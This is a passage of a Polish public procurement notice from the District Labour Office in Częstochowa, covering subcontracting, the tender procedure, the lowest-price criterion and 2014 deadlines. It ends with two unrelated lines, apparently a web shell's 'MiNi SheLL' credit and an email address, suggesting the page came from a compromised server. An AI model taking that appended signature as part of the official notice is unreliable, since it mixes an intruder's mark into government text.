3. Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na potencjał techniczny, wiedzę i doświadczenie lub zdolności finansowe innych podmiotów (na podstawie art. 26 ust. 2b Prawa zamówień publicznych) jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedkłada pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
4. Wykaz części zamówienia przekazanych do realizacji przez podwykonawców stanowiący załącznik nr 6 do SIWZ. Jeśli Wykonawca nie będzie przekazywał do realizacji przez podwykonawców żadnej części zamówienia należy również złożyć załącznik nr 6, w odpowiednie pola wpisując Nie dotyczy. Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w Rozdziale V SIWZ, Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
5. Wykonawca wyłoniony w drodze postępowania na realizację zamówienia składa najpóźniej w dniu podpisania umowy: a) w przypadku udzielenia zamówienia konsorcjum (tzn. wykonawcy określonemu w art. 23 ust. 1 Prawa zamówień publicznych), Zamawiający przed podpisaniem umowy zażąda złożenia umowy regulującej współpracę tych Wykonawców.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pup.bip.czestochowa.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Częstochowie - pok. 209, ul. Szymanowskiego 15, 42-217 Częstochowa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.06.2014 godzina 08:30, miejsce: Powiatowy Urząd Pracy w Częstochowie - pok. 114, ul. Szymanowskiego 15, 42-217 Częstochowa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com